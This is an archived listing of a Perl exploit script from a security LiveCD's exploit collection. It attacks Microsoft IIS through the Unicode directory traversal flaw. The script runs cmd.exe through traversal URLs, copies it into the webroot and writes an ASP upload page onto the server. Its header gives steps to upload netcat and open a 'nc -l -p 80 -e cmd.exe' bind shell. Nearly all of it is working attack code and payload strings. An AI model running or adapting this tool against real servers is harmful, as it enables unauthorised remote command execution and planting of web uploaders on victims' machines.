home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / unicodeloader.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  6.3 KB  |  171 lines
  1. #!/usr/bin/perl 
  2. #######################
  3. # Unicode upload creator
  5. # Works like this - two files (upload.asp and upload.inc - have 
  6. # in the same dir as the PERL script) are build in the webroot 
  7. # (or anywhere else) using echo and some conversion strings.
  8. # These files allows you to upload any file by 
  9. # simply surfing with a browser to the server.
  11. # Typical use: (5 easy steps to a shell)
  12. # 1. Find the webroot (duh)- let say its f:\the web pages\theroot
  13. # 2. perl unicodeloader target:80 'f:\the web pages\theroot'
  14. # 3. surf to target/upload.asp and upload nc.exe
  15. # 4. perl unicodexecute3.pl target:80 'f:\the web pages\theroot\nc -l -p 80 -e cmd.exe'
  16. # 5. telnet target 80
  18. # Above procedure will drop you into a shell on the box
  19. # without crashing the server (*winks at Eeye*).
  20. # Of coure you might want to upload other goodies as well
  21. # right after nc.exe - fscan.exe seems a good choice :)
  22. # This procedure is nice for servers that are very tightly 
  23. # firewalled; no FTP, RCP or TFTP out of it - as everything
  24. # is client---> server on port 80.
  25. #
  26. # kids, please have a *good* look at the code before you use it :-]
  27. # more info at http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
  28. #
  29. # 2001/01/24 Roelof Temmingh 
  30. # roelof@sensepost.com
  31. # http://www.sensepost.com
  32. #
  33. # PS: if the script breaks during the building of the uploader page
  34. #     you should delete both upload.asp and upload.inc manually
  35. ######################################################################################
  36.  
  37. use Socket;
  38.  
  39. my $runi; my $thedir; $|=1;
  40. open (ASP,"upload.asp") || die "Couldnt open the upload.asp file\n";
  41. open (INC,"upload.inc") || die "Couldnt open the upload.inc file\n";
  42. # --------------init
  43. if ($#ARGV<1) {die "Usage: unicodeloader IP:port webroot\n";}
  44. my ($host,$port)=split(/:/,@ARGV[0]);
  45. my $target = inet_aton($host);
  46. my $location=@ARGV[1];
  47. print "\nCreating uploading webpage on $host on port $port.\nThe webroot is $location.\n\n";
  48. # -------------find the correct string
  49. my @unis=(
  50. "/scripts/..%c0%af../winnt/system32/cmd.exe?/c",
  51. "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c",
  52. "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  53. "/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  54. "/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  55. "/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  56. "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c",
  57. "/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c");
  58. my $uni;my $execdir; my $dummy; my $line;
  59. foreach $uni (@unis){
  60.  print "testing directory $uni\n";
  61.  my @results=sendraw("GET $uni+dir HTTP/1.0\r\n\r\n");
  62.  foreach $line (@results){
  63.   if ($line =~ /Directory/) {
  64.   ($dummy,$execdir)=split(/Directory of /,$line);   
  65.    $execdir =~ s/\r//g;
  66.    $execdir =~ s/\n//g;
  67.    if ($execdir =~ / /) {$thedir="%22".$execdir;}
  68.     else {$thedir=$execdir;}
  69.    $thedir=~ s/ /%20/g;
  70.    print "farmer brown directory: $thedir\n";
  71.    $runi=$uni; goto further;}
  72.  }
  73. }
  74. die "nope...sorry..not vulnerable\n";
  75.  
  76. further:
  77. #---------------test if upload exists already
  78. my $a=`which ifconfig`; chomp $a; 
  79. my $aa=`$a -au | grep -i mask | grep -v 127.0.0.1 | head -n 1`; $aa=~s/ //g;
  80. sendraw("GET /naughty_real_$aa\r\n\r\n");
  81. my $command; my $line;
  82. if ($location =~ / /) {$command="dir %22".$location."%22";}
  83.  else {$command="dir ".$location;}
  84. $command=~s/ /+/g;
  85. my @results=sendraw("GET $runi+$command\r\n\r\n");
  86. foreach $line (@results){
  87.  if ($line =~ /upload.asp/) {die "uploader is there already..\n";}
  88. }
  89. # --------------test if cmd has been copied:
  90. my $failed=1;
  91. my $command="dir $thedir%22";
  92. $command=~s/ /+/g;
  93. my @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
  94. my $line;
  95. foreach $line (@results){
  96.  if ($line =~ /denied/) {die "cant do a dir in the directory - try switching dirs order around\n";}
  97.  if ($line =~ /sensepost.exe/) {print "sensepost.exe found on system\n"; $failed=0;}
  98. }
  99. #--------------we should copy it if its not there
  100. my $failed2=1;
  101. if ($failed==1) { 
  102.  print "sensepost.exe not found - lets copy it quick\n";
  103.  $command="copy c:\\winnt\\system32\\cmd.exe $thedir\\sensepost.exe%22";
  104.  $command=~s/ /+/g;
  105.  my @results2=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
  106.  my $line2;
  107.  foreach $line2 (@results2){
  108.   if (($line2 =~ /copied/ )) {$failed2=0;}
  109.   if (($line2 =~ /denied/ )) {die "access denied to copy here - try switching dirs order around\n";}
  110.  }
  111.  if ($failed2==1) {die "copy of CMD failed - inspect manually:\n@results2\n\n"};
  113. # ------------ we can assume that the cmd.exe is copied from here..
  114. my $path;
  115. ($dummy,$path)=split(/:/,$thedir);
  116. $path =~ s/\\/\//g;
  117. my @unidirs=split(/\//,$runi);
  118. my $unidir=@unidirs[1];
  119. $runi="/".$unidir."/sensepost.exe?/c";
  120. print "uploading ASP section:\n";
  121. while (<ASP>) {
  122.  chomp;
  123.  s/([<^&>])/^$1/g; s/\%/%25/g; s/\>/%3e/g;
  124.  s/\</%3c/g; s/([\x0D\x0A])//g; s/\=/%3d/g;
  125.  s/\&/%26/g; s/\+/%2b/g;
  126.  if ($location =~ / /) {$command="echo $_ >> %22".$location."\\upload.asp%22";}
  127.   else {$command="echo $_ >> $location\\upload.asp";}
  128.   $command=~s/ /%20/g;
  129.   @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
  130.   print ".";
  131.   foreach $line (@results){
  132.    if ($line =~ /denied/) {die "sorry, access denied to write the upload page\n";}
  133.   }
  134. }
  135. close (ASP);
  136. ###its really just the same as the previous one
  137. print "\nuploading the INC section: (this may take a while)\n";
  138. while (<INC>) {
  139.  chomp;
  140.  s/([<^&>])/^$1/g; s/\%/%25/g; s/\>/%3e/g;
  141.  s/\</%3c/g; s/([\x0D\x0A])//g; s/\=/%3d/g;
  142.  s/\&/%26/g;  s/\+/%2b/g;
  143.  if ($location =~ / /) {$command="echo $_ >> %22".$location."\\upload.inc%22";}
  144.   else {$command="echo $_ >> $location\\upload.inc";}
  145.  $command=~s/ /%20/g;
  146.  my @results=sendraw("GET $runi+$command HTTP/1.0\r\n\r\n");
  147.  print ".";
  148. }
  149. close (INC);
  150. print "\nupload page created. \n\nNow simply surf to $host/upload.asp and enjoy.\n";
  151. print "Files will be uploaded to $location\n";
  152.  
  153. # -------------slighty modified RFP sendraw
  154. sub sendraw { 
  155.  my ($pstr)=@_;
  156.  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
  157.  if(connect(S,pack "SnA4x8",2,$port,$target)){
  158.   my @in="";
  159.   select(S); $|=1; print $pstr;
  160.   while(<S>) { 
  161.    push @in,$_; last if ($line=~ /^[\r\n]+$/ );}
  162.   select(STDOUT); return @in;
  163.  } else { die("connect problems\n"); }
  164. }
  165. # Spidermark: sensepostdata unicodeloader
  166.  
  167.  
  168.  
  169.  
  170.  
  171.